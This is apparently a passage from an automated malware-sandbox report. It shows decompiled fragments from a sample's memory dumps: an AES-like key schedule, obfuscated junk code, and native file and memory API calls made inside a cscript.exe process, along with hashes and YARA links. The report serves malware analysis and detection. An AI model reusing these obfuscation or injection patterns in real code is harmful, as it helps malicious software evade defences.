						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}

0x00402d93
0x00402d98
0x00402da0
0x00402da9
0x00402db3
0x00402dba
0x00402dc3
0x00402dce
0x00402dd6
0x00402ddf
0x00402dea
0x00402df0
0x00402df5
0x00402dfe
0x00402e09
0x00402e11
0x00402e1a
0x00402e25
0x00402e2d
0x00402e36
0x00402e41
0x00402e49
0x00402e52
0x00402e5d
0x00402e65
0x00402e6e
0x00402e80
0x00402e83
0x00402f9f
0x00402fa4
0x00402e89
0x00402e89
0x00402e8c
0x00402e8e
0x00402e91
0x00402e91
0x00402ef6
0x00402efb
0x00402efd
0x00402f03
0x00402f05
0x00402f0b
0x00402f0d
0x00402f10
0x00402f16
0x00000000
0x00000000
0x00402f72
0x00402f78
0x00402f7a
0x00402f80
0x00402f82
0x00402f87
0x00402f88
0x00402f8b
0x00402f8e
0x00402f91
0x00402f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f97
0x00402fae
0x00402fae
0x00000000

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 00402D87, Relevance: .2, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00402D87(void* __eax, signed int __ecx, void* __edx, signed char* __edi, signed int* _a4, signed int* _a8, intOrPtr _a12) {
				signed int _t70;
				intOrPtr _t75;
				signed int* _t90;
				signed int _t103;
				signed int _t105;
				signed int _t115;
				signed int _t117;
				signed int* _t120;
				signed int _t137;
				signed int _t139;
				signed int _t143;
				signed int _t164;
				signed int* _t186;

				 *__edi =  *__edi << __ecx;
				_push(_t188);
				_t90 = _a8;
				_t120 = _a4;
				_push(__edi);
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t120 =  *_t90 & 0xff00ff00 |  *_t90 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t120[1] = _t90[1] & 0xff00ff00 | _t90[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t120[2] = _t90[2] & 0xff00ff00 | _t90[2] & 0x00ff00ff;
				_t70 =  &(_t120[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t120[3] = _t90[3] & 0xff00ff00 | _t90[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t120[4] = _t90[4] & 0xff00ff00 | _t90[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t120[5] = _t90[5] & 0xff00ff00 | _t90[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t120[6] = _t90[6] & 0xff00ff00 | _t90[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t120[7] = _t90[7] & 0xff00ff00 | _t90[7] & 0x00ff00ff;
				if(_a12 != 0x100) {
					L5:
					return _t70 | 0xffffffff;
				} else {
					_t186 = _a4;
					_t75 = 0;
					_a12 = 0;
					while(1) {
						_t164 =  *(_t70 + 0x18);
						_t103 = ( *(_t186 + 4 + (_t164 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t186 + _t75 + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t186 + 4 + (_t164 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t186 + 5 + (_t164 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t186 + 4 + (_t164 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t70 - 4);
						_t137 =  *_t70 ^ _t103;
						 *(_t70 + 0x1c) = _t103;
						_t105 =  *(_t70 + 4) ^ _t137;
						 *(_t70 + 0x20) = _t137;
						_t139 =  *(_t70 + 8) ^ _t105;
						 *(_t70 + 0x24) = _t105;
						 *(_t70 + 0x28) = _t139;
						if(_t75 == 6) {
							break;
						}
						_t115 = ( *(_t186 + 4 + (_t139 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t186 + 4 + (_t139 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t186 + 4 + (_t139 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t186 + 5 + (_t139 & 0x000000ff) * 4) & 0x000000ff ^  *(_t70 + 0xc);
						_t143 =  *(_t70 + 0x10) ^ _t115;
						 *(_t70 + 0x2c) = _t115;
						_t117 =  *(_t70 + 0x14) ^ _t143;
						 *(_t70 + 0x34) = _t117;
						_t75 = _a12 + 1;
						 *(_t70 + 0x30) = _t143;
						 *(_t70 + 0x38) = _t117 ^ _t164;
						_t70 = _t70 + 0x20;
						_a12 = _t75;
						if(_t75 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}

0x00402d89
0x00402d90
0x00402d93
0x00402d98
0x00402d9d
0x00402da0
0x00402da9
0x00402db3
0x00402dba
0x00402dc3
0x00402dce
0x00402dd6
0x00402ddf
0x00402dea
0x00402df0
0x00402df5
0x00402dfe
0x00402e09
0x00402e11
0x00402e1a
0x00402e25
0x00402e2d
0x00402e36
0x00402e41
0x00402e49
0x00402e52
0x00402e5d
0x00402e65
0x00402e6e
0x00402e80
0x00402e83
0x00402f9d
0x00402fa4
0x00402e89
0x00402e89
0x00402e8c
0x00402e8e
0x00402e91
0x00402e91
0x00402ef6
0x00402efb
0x00402efd
0x00402f03
0x00402f05
0x00402f0b
0x00402f0d
0x00402f10
0x00402f16
0x00000000
0x00000000
0x00402f72
0x00402f78
0x00402f7a
0x00402f80
0x00402f82
0x00402f87
0x00402f88
0x00402f8b
0x00402f8e
0x00402f91
0x00402f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f97
0x00402fae
0x00402fae
0x00000000

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e67db1d354929354088c827f54701e88fb9f8989a2517c6c3d9152d3054abc1
Instruction ID: 75fa89b1fa8ebfd7e887b99783bb356bdecfec21f91e26982db3e11008c4c9bc
Opcode Fuzzy Hash: 6e67db1d354929354088c827f54701e88fb9f8989a2517c6c3d9152d3054abc1
Instruction Fuzzy Hash: F35183B3E14A214BD3188F09CC40631B792EFC8312B5F81BEDD199B397CE74A9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 0041DAB4, Relevance: .1, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 45%

			E0041DAB4(void* __eax, signed char __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi) {
				void* _t21;
				signed char _t22;
				void* _t33;
				signed int _t35;
				signed int _t36;
				void* _t37;
				signed int _t38;

				_t22 = __ebx;
				_t21 = __eax;
				_t38 = _t37 -  *0xcdc9dcf;
				_t35 = __esi -  *0xda30a4c4;
				_pop( *0x16b3258b);
				asm("adc ebp, [0xc5cb1d3]");
				_t33 = __edi - 1;
				asm("adc [0xc40e031a], ah");
				 *0x8914e6eb =  *0x8914e6eb << 0x16;
				 *0xe871ff85 =  *0xe871ff85 ^ _t38;
				asm("sbb esp, 0x3b1937cd");
				asm("adc [0x8a0648b5], cl");
				if((__edx & 0xa20fa2eb ^  *0xf00f9435 |  *0xbf7e39b3) != 0) {
					L1:
					_t22 = _t22 &  *0x963408d2;
					 *0x7a0d8ba2 =  *0x7a0d8ba2 - 0x3cc14109;
					_t33 = _t33 + 1;
					asm("sbb [0x3644e3a0], ch");
					asm("adc al, [0xc626bb6]");
				} else {
					asm("adc eax, [0xd188277a]");
					_pop(__edx);
					__esp = __esp - 0xe7554ade;
					__eflags =  *0x2cc5ce17 & __edx;
					__eax = __eax -  *0x17f6783b;
					__dl = __dl | 0x000000f6;
					__ebx = __ebx | 0x3d8d226e;
					__eflags = __ebx;
					__esi = __esp;
					if(__ebx < 0) {
						goto L1;
					} else {
						__esp = __esp &  *0x9e1eff72;
						__edx = __edx |  *0xdb10c21;
						__edx = __edx ^  *0x910f108c;
						__eflags = __edx -  *0xac8db637;
						 *0x37fee6f5 =  *0x37fee6f5 >> 0xa1;
						__edi = __edi & 0x60b93b2b;
						__ecx = __ecx -  *0xc20d54d6;
						asm("rcl dword [0x91cf16e], 0x3a");
						 *0x3847092a =  *0x3847092a & __cl;
						__ecx = __ecx +  *0xc624f15;
						 *0x4b5f4d8f =  *0x4b5f4d8f << 0x71;
						__eflags = __ebp -  *0x1f7060bf;
						__esi = 0xe6d296ff;
						 *0xe1111018 =  *0xe1111018 - __al;
						 *0x47a83339 = __ecx;
						asm("sbb ch, [0x57a8f7b7]");
						__ebx = __ebx |  *0x61121223;
						__edx = __edx &  *0xd22a9526;
						asm("rcr dword [0x9b60ef6e], 0x52");
						 *0x58aa1a8f =  *0x58aa1a8f >> 0xb4;
						asm("adc esi, [0x8f72416e]");
						__eax = __eax - 1;
						_push( *0xdd6ab027);
						asm("adc esi, 0x332c9b9c");
						__eflags =  *0xc70b7005 & __ebx;
						__ebp = __ebp -  *0x7bfcfb8;
						_push( *0xd1fd736);
						asm("cmpsw");
						 *0xd7b7406d =  *0xd7b7406d & __ebp;
						_t11 = __ebp;
						__ebp =  *0x47f8216e;
						 *0x47f8216e = _t11;
						asm("sbb bh, [0x624f1538]");
						__esi = 0xe6d296ff +  *0x5086d10e;
						__eflags = 0xe6d296ff;
						if(0xe6d296ff != 0) {
							goto L1;
						} else {
							_t12 = __eax;
							__eax =  *0x4029b775;
							 *0x4029b775 = _t12;
							__esp = __esp ^ 0x7b436c15;
							 *0xe4ba563 =  *0xe4ba563 | __ch;
							__eflags =  *0x1febb05 & 0xe6d296ff;
							_pop(__edi);
							asm("adc esp, [0x6421ce09]");
							__ebx = __ebx + 1;
							__eflags = __ebx;
							if(__ebx != 0) {
								goto L1;
							} else {
								asm("rcl dword [0x4ba5637b], 0x2f");
								 *0x55459711 =  *0x55459711 ^ __ebp;
								__edi = __edi - 1;
								asm("rcr byte [0x15ba25b1], 0x43");
								__eax = __eax & 0x4fa82568;
								asm("movsb");
								__bh = __bh - 0x86;
								_t15 = __ebx;
								__ebx =  *0xd2f2d19;
								 *0xd2f2d19 = _t15;
								__ebp = __ebp |  *0x882a98d5;
								__edi = __edi + 1;
								 *0x624f1538 = __al;
								__ebx =  *0xd2f2d19 +  *0xaae9fb1d;
								__dl = 0;
								__ecx = __ecx - 0xb95d98fc;
								__eflags =  *0x9b6d9de2 & __ah;
								__eflags = __edx;
								if(__eflags != 0) {
									goto L1;
								} else {
									__esp =  *0xd0e31d7b;
									__ecx = 0x8c83ae35;
									if(__eflags < 0) {
										goto L1;
									} else {
										asm("rcr dword [0xf7881672], 0xb5");
										if(__eflags < 0) {
											goto L1;
											do {
												do {
													do {
														goto L1;
													} while (_t21 !=  *0xf205cdb5);
													_t35 = _t35 +  *0xcf63b7b;
													_t22 = _t22 +  *0x77da6d88;
													 *0xe6035f64 =  *0xe6035f64 ^ _t35;
													asm("adc dl, 0x8");
												} while ( *0xe6035f64 >= 0);
												asm("adc edi, 0xe2bbec73");
												asm("adc [0xc9901399], ebx");
												 *0x660d6abc =  *0x660d6abc - _t36;
												_push(0x3cc14109);
												_t36 = _t36 &  *0x4fb89bf0;
												_t22 =  *0x13625927;
												 *0x25ac2593 =  *0x25ac2593 >> 0x89;
												 *0x1d63b395 =  *0x1d63b395 ^ _t38;
											} while (0x3cc1410a <= 0);
											 *0x310136c9 =  *0x310136c9 << 0x39;
											asm("sbb ebp, [0xd839c0c5]");
											return _t21;
										} else {
											asm("rol dword [0x397a1778], 0x7");
											__ebp = __ebp &  *0x5e7d3ddc;
											 *0x6ed9a4e1 = __esp & 0x939fec1b;
											__esi = __esi ^  *0x6aad206e;
											__ebx = __ebx - 1;
											__esp = __esp - 1;
											asm("sbb [0xd30d1084], cl");
											asm("adc [0xc4c36fb1], cl");
											__ebp = 0x47fd3468;
											__dl = 0x00000000 ^  *0x624f1538;
											__eflags = 0x00000000 ^  *0x624f1538;
											asm("sbb ecx, [0x3a616717]");
											__ecx =  *0x5595f789;
											 *0x5595f789 = 0x8c83ae35;
											return __eax;
										}
									}
								}
							}
						}
					}
				}
			}

0x0041dab4
0x0041dab4
0x0041dab4
0x0041daba
0x0041dac6
0x0041dacc
0x0041dad2
0x0041dadc
0x0041dae2
0x0041dae9
0x0041daf8
0x0041dafe
0x0041db10
0x0041cfa6
0x0041cfac
0x0041cfb2
0x0041cfb8
0x0041cfb9
0x0041cfc5
0x0041db16
0x0041db16
0x0041db1c
0x0041db1d
0x0041db24
0x0041db2a
0x0041db30
0x0041db33
0x0041db33
0x0041db39
0x0041db3a
0x00000000
0x0041db40
0x0041db40
0x0041db46
0x0041db4c
0x0041db52
0x0041db58
0x0041db5f
0x0041db65
0x0041db6c
0x0041db73
0x0041db79
0x0041db7f
0x0041db86
0x0041db8c
0x0041db92
0x0041db98
0x0041db9e
0x0041dba4
0x0041dbaa
0x0041dbb0
0x0041dbb7
0x0041dbbe
0x0041dbc4
0x0041dbc5
0x0041dbcb
0x0041dbd1
0x0041dbd7
0x0041dbdd
0x0041dbe3
0x0041dbe5
0x0041dbeb
0x0041dbeb
0x0041dbeb
0x0041dbf1
0x0041dbf7
0x0041dbf7
0x0041dbfd
0x00000000
0x0041dc03
0x0041dc03
0x0041dc03
0x0041dc03
0x0041dc09
0x0041dc0f
0x0041dc15
0x0041dc1b
0x0041dc1c
0x0041dc22
0x0041dc22
0x0041dc23
0x00000000
0x0041dc29
0x0041dc29
0x0041dc30
0x0041dc36
0x0041dc37
0x0041dc3e
0x0041dc43
0x0041dc44
0x0041dc47
0x0041dc47
0x0041dc47
0x0041dc4d
0x0041dc59
0x0041dc5a
0x0041dc5f
0x0041dc65
0x0041dc67
0x0041dc6d
0x0041dc73
0x0041dc79
0x00000000
0x0041dc7f
0x0041dc7f
0x0041dc85
0x0041dc8a
0x00000000
0x0041dc90
0x0041dc90
0x0041dc97
0x00000000
0x0041cfa6
0x0041cfa6
0x0041cfa6
0x00000000
0x00000000
0x0041cfcd
0x0041cfd3
0x0041cfd9
0x0041cfdf
0x0041cfdf
0x0041cfe4
0x0041cfea
0x0041cff6
0x0041cffc
0x0041d002
0x0041d008
0x0041d00e
0x0041d015
0x0041d01e
0x0041d031
0x0041d038
0x0041d03e
0x0041dc9d
0x0041dc9d
0x0041dca4
0x0041dcb1
0x0041dcb7
0x0041dcbd
0x0041dcbe
0x0041dcbf
0x0041dcc5
0x0041dccb
0x0041dcd1
0x0041dcd1
0x0041dcd7
0x0041dcde
0x0041dcde
0x0041dce4
0x0041dce4
0x0041dc97
0x0041dc8a
0x0041dc79
0x0041dc23
0x0041dbfd
0x0041db3a

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aa443f26d21b1cf1824d85f6181349ac30f1e47b0321ee6cec59b9f07b0a996
Instruction ID: 712df88c8885b60a761b9e0b7639f84878db7abd8993efe8bb25c3317e7db315
Opcode Fuzzy Hash: 0aa443f26d21b1cf1824d85f6181349ac30f1e47b0321ee6cec59b9f07b0a996
Instruction Fuzzy Hash: 74617A72A44790CFDB16DF3CED96B427FB2F796324B09024EC9A153196D3342566CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00401030, Relevance: .1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}

0x00401030
0x0040105b
0x0040105d
0x00401063
0x00401065
0x00401065
0x00401071
0x00401076
0x0040107c
0x004010ac
0x004010ae
0x004010b4
0x004010ba
0x004010bc
0x004010bc
0x004010cb
0x004010d0
0x004010d6
0x00401101
0x00401103
0x00401109
0x0040110f
0x00401111
0x00401111
0x00401120
0x00401128
0x0040112b
0x0040114f
0x00401156
0x0040115d
0x00401169
0x0040116c
0x0040116f
0x00401173

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5

Uniqueness

Uniqueness Score: -1.00%

Function 00416C9C, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6c453a4afec2cbeb275a449c49ec4fe2fe0d737f2d4308d86657a89f548aa45
Instruction ID: 6a1e3bd19362642cdeaeda891220920f01aabeac24d4a2725a8d8fb4f8384514
Opcode Fuzzy Hash: e6c453a4afec2cbeb275a449c49ec4fe2fe0d737f2d4308d86657a89f548aa45
Instruction Fuzzy Hash: BEC08C02E2A102014A220A1CAC814F0F7A8918703880063C2E814333449043D42005DA

Uniqueness

Uniqueness Score: -1.00%

Function 00407AFB, Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00407AFB(void* __edi) {

				asm("adc eax, [ss:ebp+0x3f1c5e66]");
				return 1;
			}

0x00407afc
0x00407b1a

Memory Dump Source

Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 106fd65f005b6c10de70964aacc8c844fe8b941deffd990d873677b3f2880be3
Instruction ID: 2136b1a75945695752618d0f582d1b2d73e605b7700c0ad20a98be9a2538685e
Opcode Fuzzy Hash: 106fd65f005b6c10de70964aacc8c844fe8b941deffd990d873677b3f2880be3
Instruction Fuzzy Hash: 85C08C32A1500E8AEA20CC0CF8816F4F3E8EB4632CF082297D808A32008082D4960258

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cscript.exe PID: 2000 Parent PID: 3388 cscript.exeCOMMON

Executed Functions

Function 03219D5B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03214B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03214B87,007A002E,00000000,00000060,00000000,00000000), ref: 03219DAD

Strings

.z`, xrefs: 03219D9D, 03219DA8

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 00b872a2f08bdf8bbf328021e9f9b12229bb7762afb927f494f6b9f664d87a02
Instruction ID: 8f62fd804dbb24a8a6c98f8bc78f4fdcb4d278b53c964c8c0cff2b2f07d7e95f
Opcode Fuzzy Hash: 00b872a2f08bdf8bbf328021e9f9b12229bb7762afb927f494f6b9f664d87a02
Instruction Fuzzy Hash: EB01B6B6215108AFCB48CF98DC84DEB37EEEF8C754F158248BA1DD7250D630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03219D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03214B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03214B87,007A002E,00000000,00000060,00000000,00000000), ref: 03219DAD

Strings

.z`, xrefs: 03219D9D, 03219DA8

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 8d6104beb54ebfb81c373189ce763fe65c13db7aa96895e5aa90bf80b5af539e
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 00F0B2B2211208ABCB08CF88DC84EEB77EDAF8C754F158248BA0D97240C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 03219E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03214D42,5EB6522D,FFFFFFFF,03214A01,?,?,03214D42,?,03214A01,FFFFFFFF,5EB6522D,03214D42,?,00000000), ref: 03219E55

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 1a528665509752b2071755acb7cbbd52646f0af6746beba2aa0d2af45128c32b
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: F1F0A4B6210208ABCB14DF89DC80EEB77ADEF8C754F158248BA1DA7241D630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03219F3A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03202D11,00002000,00003000,00000004), ref: 03219F79

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 844f2b00d9e26735b9789c95e41092d375dc6f3a3d251b35ce7d0d150660873b
Instruction ID: fb5f6a3f64968b8e3e03d9f6654ac914cfd0a08618301b96d5268c4ef142c943
Opcode Fuzzy Hash: 844f2b00d9e26735b9789c95e41092d375dc6f3a3d251b35ce7d0d150660873b
Instruction Fuzzy Hash: 65F01CB6200249BFCB14DF98CC81EEB7BA9EF9C354F158158FA4C97241C630E961CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03219F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03202D11,00002000,00003000,00000004), ref: 03219F79

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: c76d9174ad205ddcf51d4c9d3e87efc9a229855e096f35872d3da5f43cc202aa
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 80F015B6210208ABCB14DF89CC80EAB77ADEF88650F118148BE08A7241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 03219E8B, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03214D20,?,?,03214D20,00000000,FFFFFFFF), ref: 03219EB5

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: e9a9820e81e42be31f3a07556a1d077fe0e7c1c277b895f5d19580ece4d098da
Instruction ID: 60642f08d3599b898509dac73b89b75c670905004c5becce8094946dc6fadb1e
Opcode Fuzzy Hash: e9a9820e81e42be31f3a07556a1d077fe0e7c1c277b895f5d19580ece4d098da
Instruction Fuzzy Hash: 44E0C2352003047FD720EFA8CC85EE77BACEF44660F094499BA4C6B242C530FA5087E0

Uniqueness

Uniqueness Score: -1.00%

Function 03219E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03214D20,?,?,03214D20,00000000,FFFFFFFF), ref: 03219EB5

Memory Dump Source

Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 680a74885e460dbe76731d57847a1e0d517e50cc824b1cd05d929e777bbb318e
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 50D012752003146BD710EB98CC85E9777ACEF44660F154455BA5C5B241C570F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 053D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 053D991A

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6138274e3d8b980cd59c6d644c577dd277f5776323af4b839e513de1dbf23fd4
Instruction ID: 8219dc851c34bb9668d61aaf9e2b543211d6dffe4c5d482e7cace6502ed0936a
Opcode Fuzzy Hash: 6138274e3d8b980cd59c6d644c577dd277f5776323af4b839e513de1dbf23fd4
Instruction Fuzzy Hash: 839002B520101402D14071594444756005597D0381F91C425A9095558E86998DD576A5

